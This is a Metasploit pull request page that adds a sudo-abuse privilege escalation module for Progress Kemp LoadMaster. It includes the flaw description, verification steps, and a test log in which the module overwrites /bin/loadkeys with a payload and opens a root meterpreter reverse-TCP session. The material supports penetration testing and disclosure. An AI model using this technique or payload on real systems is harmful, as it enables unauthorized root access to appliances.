Add Kemp Progress Loadmaster sudo abuse priv esc #19100
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
bwatters-r7
added
module
rn-modules
jvoisin
reviewed
Apr 23, 2024
modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
Outdated
Show resolved
Hide resolved
bwatters-r7
force-pushed
the
module/loadmaster-priv-esc
branch
from
8071197 to
742326a
Compare
bwatters-r7
commented
May 2, 2024
modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
Outdated
Show resolved
Hide resolved
|
All suggestions on #19150 should be addressed here, too.... |
bwatters-r7
commented
May 6, 2024
modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
Outdated
Show resolved
Hide resolved
smcintyre-r7
requested changes
May 10, 2024
modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024.rb
Outdated
Show resolved
Hide resolved
smcintyre-r7
approved these changes
May 10, 2024
There was a problem hiding this comment.
Changes are looking good now, I'll go ahead and get this landed.
Testing Output
metasploit-framework (S:1 J:0) exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > show options
Module options (exploit/linux/local/progress_kemp_loadmaster_sudo_privesc_2024):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION -1 yes The session to run this module on
TARGET_BINARY /bin/loadkeys yes The path for a binary file that has permission to auto-elevate.
WRITABLE_DIR /tmp yes A directory where we can write files
Payload options (linux/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.31.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Dropper
View the full module info with the info, or info -d command.
metasploit-framework (S:1 J:0) exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > set VERBOSE
VERBOSE => false
metasploit-framework (S:1 J:0) exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > set VERBOSE true
VERBOSE => true
metasploit-framework (S:1 J:0) exploit(linux/local/progress_kemp_loadmaster_sudo_privesc_2024) > run
[*] Started reverse TCP handler on 192.168.31.129:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Found 3 indicators this is a KEMP product
[!] The service is running, but could not be validated.
[*] Writing payload to /tmp/.ihcqxrugkuq
[*] Moving /bin/loadkeys to /tmp/.kfoikqlxhta
[*] Moving /tmp/.ihcqxrugkuq to /bin/loadkeys
[*] Running /bin/loadkeys
[+] Deleted /tmp/.ihcqxrugkuq
[*] Meterpreter session 2 opened (192.168.31.129:4444 -> 192.168.31.135:43420) at 2024-05-10 10:19:37 -0400
[*] Moving /tmp/.kfoikqlxhta to /bin/loadkeys
[+] /bin/loadkeys returned to original contents
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 192.168.31.135
OS : SuSE 7.2 (Linux 4.14.137)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > pwd
/
meterpreter >
Release NotesThis adds a privilege escalation exploit module for LoadMaster that abuses the configuration of the |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This adds a privilege escalation module targeting Progress Kemp LoadMaster versions including
7.2.59.2.22338. The vulnerability lies in the configuration to allowsudoto auto elevate when run with certain files, but grants the non-root userbalwrite permissions to those file. This exploit simply overwrites one of the files that auto-elevates with/bin/bashand runs a payload within a root-enabled /bin/bash session.Verification
List the steps needed to make sure this thing works
baluseruse exploits/linux/local/progress_kemp_loadmaster_sudo_privesc_2024set SESSION <session>set LHOST <your host IP>runrootuser.Note
The easiest way to test this is in conjunction with #18972, which this was a part of until we realized that when they patched CVE-2024-1212, they did not patch this.